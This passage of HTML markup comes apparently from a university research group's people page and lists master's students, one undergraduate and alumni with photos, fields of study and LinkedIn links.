8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c134-outer\">\n            <div data-colibri-id=\"182-c134\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c134 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c135\" class=\"d-block style-854 style-local-182-c135 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-md-shah-sayem-e1697207514119.jpg\" class=\"wp-image-1761 style-854-image style-local-182-c135-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c135-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c136\" class=\"h-global-transition-all h-heading style-850 style-local-182-c136 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c136\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Shah Md Shahnewaz Sayem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c137\" class=\"h-text h-text-component style-851 style-local-182-c137 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c138\" class=\"h-text h-text-component style-902 style-local-182-c138 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c139\" class=\"style-855 style-local-182-c139 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/shah-md-shahnewaz-sayem-767540154/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c228-outer\">\n            <div data-colibri-id=\"182-c228\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c228 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c229\" class=\"d-block style-854 style-local-182-c229 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2024/11/Shreyatadipaneni.jpg\" class=\"wp-image-1875 style-854-image style-local-182-c229-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c229-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c230\" class=\"h-global-transition-all h-heading style-850 style-local-182-c230 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c230\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Shreya Tadipaneni</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c231\" class=\"h-text h-text-component style-851 style-local-182-c231 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c232\" class=\"h-text h-text-component style-902 style-local-182-c232 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c233\" class=\"style-855 style-local-182-c233 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/shreya-tadipaneni-22a4451a6/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c234-outer\">\n            <div data-colibri-id=\"182-c234\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c234 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c235\" class=\"d-block style-854 style-local-182-c235 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2024/11/Anshul-Gupta.jpg\" class=\"wp-image-1876 style-854-image style-local-182-c235-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c235-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c236\" class=\"h-global-transition-all h-heading style-850 style-local-182-c236 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c236\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anshul Gupta</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c237\" class=\"h-text h-text-component style-851 style-local-182-c237 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c238\" class=\"h-text h-text-component style-902 style-local-182-c238 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c239\" class=\"style-855 style-local-182-c239 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anshulgupta-panther/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c149\" id=\"undergrads-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-828 style-local-182-c149 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c156\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-842 style-local-182-c156 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-843-outer style-local-182-c157-outer\">\n            <div data-colibri-id=\"182-c157\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-843 style-local-182-c157 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c158\" class=\"h-global-transition-all h-heading style-844 style-local-182-c158 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-844 style-local-182-c158\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Undergraduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c150\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-829 style-local-182-c150 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c151-outer\">\n            <div data-colibri-id=\"182-c151\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c151 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c152\" class=\"d-block style-831 style-local-182-c152 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-IMG_9249-e1697207848252.jpg\" class=\"wp-image-1765 style-831-image style-local-182-c152-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c152-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c153\" class=\"h-global-transition-all h-heading style-832 style-local-182-c153 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c153\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">MD Raiyan Haque</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c154\" class=\"h-text h-text-component style-833 style-local-182-c154 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c155\" class=\"style-835 style-local-182-c155 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"	 4:40 PM       https://www.linkedin.com/in/mdraiyanhaque/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c159\" id=\"alumni\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-910 style-local-182-c159 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c225\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-924 style-local-182-c225 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-925-outer style-local-182-c226-outer\">\n            <div data-colibri-id=\"182-c226\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-925 style-local-182-c226 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c227\" class=\"h-global-transition-all h-heading style-926 style-local-182-c227 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-926 style-local-182-c227\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Alumni</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c160\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-911 style-local-182-c160 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c161-outer\">\n            <div data-colibri-id=\"182-c161\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c161 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c162\" class=\"d-block style-913 style-local-182-c162 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Sarah_Akinola-scaled-2-e1697208116294.jpg\" class=\"wp-image-1772 style-913-image style-local-182-c162-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c162-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c163\" class=\"h-global-transition-all h-heading style-914 style-local-182-c163 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c163\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sarah Akinola</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c164\" class=\"h-text h-text-component style-915 style-local-182-c164 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c165\" class=\"style-917 style-local-182-c165 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/akinola-sarah-035789138\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c166-outer\">\n            <div data-colibri-id=\"182-c166\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c166 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c167\" class=\"d-block style-918 style-local-182-c167 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Anvith-e1697208489419.jpg\" class=\"wp-image-1780 style-918-image style-local-182-c167-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-918-frameImage style-local-182-c167-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c168\" class=\"h-global-transition-all h-heading style-914 style-local-182-c168 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c168\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anvith Anand</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c169\" class=\"h-text h-text-component style-915 style-local-182-c169 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c170\" class=\"style-919 style-local-182-c170 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a 